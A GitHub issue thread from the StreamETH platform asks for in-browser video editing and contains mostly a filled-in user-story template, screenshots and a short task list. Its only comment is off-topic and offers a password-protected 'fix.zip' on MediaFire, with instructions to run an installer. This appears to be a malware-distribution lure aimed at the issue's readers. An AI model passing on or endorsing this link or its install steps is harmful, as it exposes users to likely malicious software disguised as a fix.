### ISSUE TITLE
As a User, I want video editing capabilities inside StreamETH

### ISSUE THREAD

**Issue by Mario-SO** [streamethorg/streameth-platform#915]
## User Story
**As a** User, **I want** video editing capabilities, **so that** I can save time on postproduction.

## Acceptance Criteria
- [ ] Given [context], when [action taken], then [expected outcome]
- [ ] Given [context], when [action taken], then [expected outcome]
- [ ] Given [context], when [action taken], then [expected outcome]

## Non-functional Criteria (if applicable)
- [ ] Criterion 1 (e.g., performance, accessibility)
- [ ] Criterion 2 (e.g., security requirement, scalability)
- [ ] Criterion 3 (e.g., compliance with specific standards)

## Dependencies (if any)
- [ ] Dependency 1 (e.g., requires completion of issue #)
- [ ] Dependency 2 (e.g., requires external API endpoint to be available)

## Notes (Optional)
See [veed.io](https://veed.io) for UI references

## Mockups & Examples (Optional)
In `/org/library`

![CleanShot 2024-08-29 at 16 32 07](https://github.com/user-attachments/assets/c67d070b-75a6-40ef-adaf-ddf0f8608115)

Inside a video 

![CleanShot 2024-08-29 at 16 28 32](https://github.com/user-attachments/assets/c1574d21-c57b-464f-9708-556b762561a3)

## Tasks Breakdown (Optional)
- [ ] Create new `/editing/videoId` page
- [ ] Mock a possible UI with basic editing functionalities like video aspect ratio, intro-outro addition

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
